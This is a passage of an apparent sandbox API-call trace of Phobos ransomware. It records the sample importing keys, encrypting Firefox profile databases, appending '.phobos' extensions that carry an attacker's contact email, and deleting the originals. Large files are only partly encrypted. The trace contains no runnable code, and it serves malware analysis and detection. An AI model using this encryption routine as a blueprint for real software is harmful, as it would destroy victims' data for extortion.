(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.361] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.361] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.566] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0202.566] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.566] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa, lpOverlapped=0x0) returned 1 [0202.566] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0202.567] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0202.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0202.567] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.567] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0202.567] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.567] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0202.567] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.567] CloseHandle (hObject=0x160) returned 1 [0202.568] CloseHandle (hObject=0x174) returned 1 [0202.568] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332")) returned 1 [0202.568] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.569] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0202.569] CloseHandle (hObject=0x174) returned 1 [0202.569] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.571] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=655360) returned 1 [0202.571] CloseHandle (hObject=0x174) returned 1 [0202.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite")) returned 0x2020 [0202.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.571] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.571] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0202.572] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.572] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa0000, lpOverlapped=0x0) returned 1 [0202.600] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0010, dwBufLen=0xa0010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0010) returned 1 [0202.605] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa0010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa0010, lpOverlapped=0x0) returned 1 [0202.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0202.614] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.614] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0202.614] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.614] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0202.614] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.615] CloseHandle (hObject=0x174) returned 1 [0202.615] CloseHandle (hObject=0x160) returned 1 [0202.615] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite")) returned 1 [0202.620] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.623] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0202.623] CloseHandle (hObject=0x174) returned 1 [0202.625] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.626] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0202.626] CloseHandle (hObject=0x174) returned 1 [0202.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite")) returned 0x2020 [0202.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.626] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.626] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0202.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0202.627] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0202.627] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.627] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10000, lpOverlapped=0x0) returned 1 [0202.724] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010) returned 1 [0202.731] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10010, lpOverlapped=0x0) returned 1 [0202.749] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0202.749] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.749] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0202.749] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.749] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0202.749] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.749] CloseHandle (hObject=0x174) returned 1 [0202.749] CloseHandle (hObject=0xac) returned 1 [0202.750] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite")) returned 1 [0202.751] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0202.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0202.752] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10485760) returned 1 [0202.752] CloseHandle (hObject=0xac) returned 1 [0202.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite")) returned 0x2020 [0202.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0202.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0202.753] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0202.753] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0202.753] ReadFile (in: hFile=0xac, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0202.781] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x355555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0202.781] ReadFile (in: hFile=0xac, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0202.784] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x9c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0202.784] ReadFile (in: hFile=0xac, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0202.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32a28) returned 1 [0202.788] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0202.788] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0202.794] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.794] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0202.794] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0206.629] SetEndOfFile (hFile=0xac) returned 1 [0206.629] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x9c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0206.629] WriteFile (in: hFile=0xac, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0206.631] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x355555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0206.631] WriteFile (in: hFile=0xac, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0206.633] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0206.633] WriteFile (in: hFile=0xac, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0206.637] CloseHandle (hObject=0xac) returned 1 [0206.637] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0206.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.638] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0206.638] CloseHandle (hObject=0xac) returned 1 [0206.638] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0206.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.639] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0206.639] CloseHandle (hObject=0xac) returned 1 [0206.639] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0206.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.640] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0206.640] CloseHandle (hObject=0xac) returned 1 [0206.640] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0206.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0206.640] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0206.640] CloseHandle (hObject=0xac) returned 1 [0206.640] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0206.641] CreateFileW 